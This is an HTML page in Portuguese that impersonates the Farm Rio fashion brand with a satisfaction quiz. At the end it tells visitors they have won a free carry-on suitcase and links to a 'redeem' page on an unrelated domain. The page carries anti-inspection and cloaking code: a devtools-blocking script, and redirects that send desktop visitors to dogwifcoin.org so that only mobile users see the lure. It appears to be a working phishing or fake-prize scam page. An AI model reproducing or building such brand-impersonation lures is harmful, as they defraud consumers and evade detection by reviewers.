﻿<!DOCTYPE html><html lang="pt-br"><head>
    <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/latest.js" async="" defer=""></script>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="../7c8b165db7814f5fb47ad577c2b582e5/css/bootstrap.min.css">
  <link rel="stylesheet" href="../7c8b165db7814f5fb47ad577c2b582e5/css/style.css">
  <link rel="stylesheet" href="../7c8b165db7814f5fb47ad577c2b582e5/css/all.min.css">
  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/jquery-3.7.1.min.js" crossorigin="anonymous"></script>
  <link rel="icon" href="../7c8b165db7814f5fb47ad577c2b582e5/images/favicon228.png" type="image/x-icon">
  <link rel="apple-touch-icon" sizes="180x180" href="../7c8b165db7814f5fb47ad577c2b582e5/images/favicon228.png">
  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/bootstrap.bundle.min.js"></script>
  <title>Avaliação Farm Rio</title>

  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/latest.js" async defer=""></script>
  <script disable-devtool-auto="" src="../7c8b165db7814f5fb47ad577c2b582e5/disable-devtool" url="https://google.com.br"></script>
  <script type="text/javascript">
    if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
        window.location.href = 'https://dogwifcoin.org/';
    }
  </script>
  <script type="text/javascript">
    window.hasMobileFirstExtension = true;
  </script>

            <script>
                const v_123_pageId = "6676f1683ff86be06d012e37";
                const v_123_siteId = "667443baf6e7294397413551";
                const v_123_siteType = "HTML";
                const v_123_slug = null;
            </script>

            <script src="../scripts/utms/latest.js" async="" defer=""></script></head>

<body>
  <header>
    <i class="fa-solid fa-bars" style="color: white"></i>
    <!-- <img src="assets/images/google_logo.svg" alt=""> -->
    <img src="../7c8b165db7814f5fb47ad577c2b582e5/images/logo-farm-rio-vertical-1024.png" alt="">
    <span id="saldo" style="margin-left: auto"></span>
  </header>
  <main>
    <div class="card pergunta01" id="pergunta01">
      <div class="card__logo">
        <img src="../7c8b165db7814f5fb47ad577c2b582e5/images/Rosenbaum-Arquitetura-FarmRio-LeBon-Marche-Paris-FlaviaRibeiro-8-min.jpg" alt="">
      </div>
      <div class="card__satisfacao">
        <h2>De 0 a 5, como você avaliaria sua familiaridade com a marca Farm Rio?</h2>
        <div class="card__gradeContainer">
          <div class="card__grade" id="card__grade1" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star1"></i>
          </div>
          <div class="card__grade" id="card__grade2" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star2"></i>
          </div>
          <div class="card__grade" id="card__grade3" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star3"></i>
          </div>
          <div class="card__grade" id="card__grade4" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star4"></i>
          </div>
          <div class="card__grade" id="card__grade5" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star5"></i>
          </div>
        </div>
        <div class="card__gradeDescricao">
          <p>Muito ruim</p>
          <p>Muito bom</p>
        </div>
      </div>
      <div class="card__resposta">
        <h2>
          Quando pensa na Farm Rio, qual a primeira palavra que vem na sua
          mente?
        </h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Elegância</p>
          </div>
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Modernidade</p>
          </div>
        </div>
      </div>
      <div class="card__resposta">
        <h2>O que mais atrai você nas coleções da Farm Rio?</h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>Cores vibrantes</p>
          </div>
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>Cortes clássicos</p>
          </div>
        </div>
      </div>
      <button class="card__enviarResposta" id="enviarResposta" onclick="pergunta01()" disabled="">
        Enviar avaliação
      </button>
    </div>
    <div class="card pergunta02" id="pergunta02" style="display: none">
      <div class="card__logo">
        <img src="../7c8b165db7814f5fb47ad577c2b582e5/images/farmrio-image1.png" alt="">
      </div>
      <div class="card__satisfacao">
        <h2>
          De 0 a 5, como você avaliaria a vibe tropical das estampas da Farm Rio?
        </h2>
        <div class="card__gradeContainer">
          <div class="card__grade" id="card__grade1" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star1"></i>
          </div>
          <div class="card__grade" id="card__grade2" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star2"></i>
          </div>
          <div class="card__grade" id="card__grade3" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star3"></i>
          </div>
          <div class="card__grade" id="card__grade4" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star4"></i>
          </div>
          <div class="card__grade" id="card__grade5" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star5"></i>
          </div>
        </div>
        <div class="card__gradeDescricao">
          <p>Muito ruim</p>
          <p>Muito bom</p>
        </div>
      </div>
      <div class="card__resposta">
        <h2>
          Em qual momento você prefere usar as peças icônicas da Farm Rio?
        </h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Para celebrar ocasiões especiais</p>
          </div>
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Uso no meu dia a dia</p>
          </div>
        </div>
      </div>
      <div class="card__resposta">
        <h2>O que é você mais valoriza ao escolher as peças da Farm Rio?</h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>Conforto</p>
          </div>
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>Originalidade</p>
          </div>
        </div>
      </div>
      <button class="card__enviarResposta" id="enviarResposta" onclick="pergunta02()" disabled="">
        Enviar avaliação
      </button>
    </div>

    <div class="card pergunta03" id="pergunta03" style="display: none">
      <div class="card__logo">
        <img src="../7c8b165db7814f5fb47ad577c2b582e5/images/farmrio-image2.png" alt="">
      </div>
      <div class="card__satisfacao">
        <h2>De 0 a 5, como você avalia a experiência de presentear alguém com produtos da Farm Rio?</h2>
        <div class="card__gradeContainer">
          <div class="card__grade" id="card__grade1" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star1"></i>
          </div>
          <div class="card__grade" id="card__grade2" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star2"></i>
          </div>
          <div class="card__grade" id="card__grade3" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star3"></i>
          </div>
          <div class="card__grade" id="card__grade4" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star4"></i>
          </div>
          <div class="card__grade" id="card__grade5" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star5"></i>
          </div>
        </div>
        <div class="card__gradeDescricao">
          <p>Muito ruim</p>
          <p>Muito bom</p>
        </div>
      </div>
      <div class="card__resposta">
        <h2>Quem você adoraria presentiar com alguma peça da Farm Rio?</h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Família</p>
          </div>
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Amigos</p>
          </div>
        </div>
      </div>
      <div class="card__resposta">
        <h2>
          Qual peça da Farm Rio você escolheria para presentear alguém
          especial?
        </h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>Um vestido longo</p>
          </div>
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>Peças da linha praia</p>
          </div>
        </div>
      </div>
      <button class="card__enviarResposta" id="enviarResposta" onclick="pergunta03()" disabled="">
        Enviar avaliação
      </button>
    </div>

    <div class="card pergunta04" id="pergunta04" style="display: none">
      <div class="card__logo">
        <img src="../7c8b165db7814f5fb47ad577c2b582e5/images/farmrio-image3.png" alt="">
      </div>
      <div class="card__satisfacao">
        <h2>De 0 a 5, qual a sua avaliação para a relevância da Farm Rio em seguir as tendências da moda global?</h2>
        <div class="card__gradeContainer">
          <div class="card__grade" id="card__grade1" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star1"></i>
          </div>
          <div class="card__grade" id="card__grade2" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star2"></i>
          </div>
          <div class="card__grade" id="card__grade3" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star3"></i>
          </div>
          <div class="card__grade" id="card__grade4" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star4"></i>
          </div>
          <div class="card__grade" id="card__grade5" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star5"></i>
          </div>
        </div>
        <div class="card__gradeDescricao">
          <p>Muito ruim</p>
          <p>Muito bom</p>
        </div>
      </div>
      <div class="card__resposta">
        <h2>Qual experiência com a Farm Rio você gostaria de vivenciar?</h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Participar de um desfile exclusivo da Farm Rio, imersa no estilo Tropicool</p>
          </div>
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Explorar os bastidores de uma sessão de fotos da Farm Rio e conhecer os
              criativos por trás das coleções</p>
          </div>
        </div>
      </div>
      <div class="card__resposta">
        <h2>O que torna a Farm Rio especial para você?</h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>As estampas únicas que refletem a alegria e beleza da cultura brasileira</p>
          </div>
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>A versatilidade das peças, adequadas para diversas ocasiões</p>
          </div>
        </div>
      </div>
      <button class="card__enviarResposta" id="enviarResposta" onclick="pergunta04()" disabled="">
        Enviar avaliação
      </button>
    </div>

    <div class="card pergunta05" id="pergunta05" style="display: none">
      <div class="card__logo">
        <img src="../7c8b165db7814f5fb47ad577c2b582e5/images/farmrio-image4.png" alt="">
      </div>
      <div class="card__satisfacao">
        <h2>
          De 0 a 5, quão entusiasmado(a) você estaria por novas peças inovadoras da Farm Rio?
        </h2>
        <div class="card__gradeContainer">
          <div class="card__grade" id="card__grade1" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star1"></i>
          </div>
          <div class="card__grade" id="card__grade2" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star2"></i>
          </div>
          <div class="card__grade" id="card__grade3" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star3"></i>
          </div>
          <div class="card__grade" id="card__grade4" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star4"></i>
          </div>
          <div class="card__grade" id="card__grade5" onclick="toggleCard(this)">
            <i class="fa-regular fa-star" id="star5"></i>
          </div>
        </div>
        <div class="card__gradeDescricao">
          <p>Muito ruim</p>
          <p>Muito bom</p>
        </div>
      </div>
      <div class="card__resposta">
        <h2>
          Se você pudesse criar uma nova peça para a Farm Rio, ele seria:
        </h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Um vestido leve e fluido, com estampa inspirada na fauna brasileira</p>
          </div>
          <div class="resposta__grade resposta1" onclick="toggleResponse(this, 'resposta1')">
            <p onclick="scrollToDown()">Uma blusa versátil, perfeita para combinar com jeans ou saias coloridas</p>
          </div>
        </div>
      </div>
      <div class="card__resposta">
        <h2>O que você espera da Farm Rio no futuro?</h2>
        <div class="resposta__gradeContainer">
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>Mais lojas e acessibilidade</p>
          </div>
          <div class="resposta__grade resposta2" onclick="toggleResponse(this, 'resposta2')">
            <p>Novas parcerias e linhas temáticas exclusivas</p>
          </div>
        </div>
      </div>
      <button class="card__enviarResposta" id="enviarResposta" onclick="pergunta05()" disabled="">
        Enviar avaliação
      </button>
    </div>
    <div class="card finalizacao" id="finalizacao" style="display: none">
      <div class="finalizacao__titulo">
        <h1>PARABÉNS!</h1>
      </div>
      <div class="finalizacao__trofeu">
        <img src="../7c8b165db7814f5fb47ad577c2b582e5/images/presente.png" alt="">
      </div>
      <div class="finalizacao__descricao">
        <p>
          Você concluiu nossa avaliação da Farm Rio e ganhou uma
          <b>Mala de Bordo Exclusiva</b>! Clique no botão <b>RESGATAR</b> abaixo para
          resgatar seu prêmio.
        </p>
        <p>
          Agradecemos sua participação e esperamos que desfrute do seu kit
          cheio de carinho e encanto da Farm Rio.<br><br>Com carinho, <br>Equipe Farm Rio.
        </p>
      </div>
      <div class="finalizacao__botao">
        <a href="https://noticiasja.site/mala2/resgatehojesuafarm.online/loja/" id="umdoistrestplink1"><button><i class="fa-solid fa-gift"></i> RESGATAR</button></a>
      </div>
    </div>

    <button data-bs-toggle="modal" data-bs-target="#modal01" id="popup" style="display: none"></button>

    <div class="modal" tabindex="-1" id="modal01">
      <div class="modal-dialog modal-dialog-centered">
        <div class="modal-content">
          <div class="card apresentacao">
            <h2>
              🎉 Quiz Exclusivo Farm Rio: Bem vindos ao Mundo Tropicool da Farm Rio! 🎉
            </h2>
            <p>
              Seja bem-vindo(a) ao nosso quiz especial! Aqui na Farm Rio, celebramos o estilo tropical com um toque
              extra de autenticidade. Junte-se a nós nesta jornada de moda e ao final, ganhe uma mala de Bordo! Afinal,
              na Farm Rio, cada peça é uma celebração da sua própria autenticidade.
              <strong>Pronto para começar?</strong>
            </p>
            <button type="button" data-bs-dismiss="modal">COMEÇAR</button>
          </div>
        </div>
      </div>
    </div>
  </main>

  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/hideAllExcept.js"></script>
  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/selectedCard.js"></script>
  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/selectedResponse.js"></script>
  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/buttonCheck.js"></script>
  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/popup.js"></script>
  <script src="../7c8b165db7814f5fb47ad577c2b582e5/js/sendResponse.js"></script>
  <script>
    $(document).ready(function () {
      let data = new Date();

      var date = data.getDate();
      var month = [
        "Janeiro",
        "Fevereiro",
        "Março",
        "Abril",
        "Maio",
        "Junho",
        "Julho",
        "Agosto",
        "Setembro",
        "Outubro",
        "Novembro",
        "Dezembro",
      ][data.getMonth()];
      var year = data.getFullYear();

      $("#todayDate").html(`${date} de ${month} de ${year}**`);
    });
  </script>
  <script type="text/javascript" src="../7c8b165db7814f5fb47ad577c2b582e5/js/crypto-js.min.js"></script>

  <script>
    var popup = document.getElementById("popup");

    document.addEventListener("DOMContentLoaded", function () {
      popup.click();
    });
  </script>
   <script type="text/javascript">

      if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
          window.location.href = 'https://dogwifcoin.org/';
      }
    </script> 




                    <script async="true" src="../ghelper/googletagmanager.js"></script>
                <script src="../scripts/utms/latest.js" async="" defer=""></script></body></html>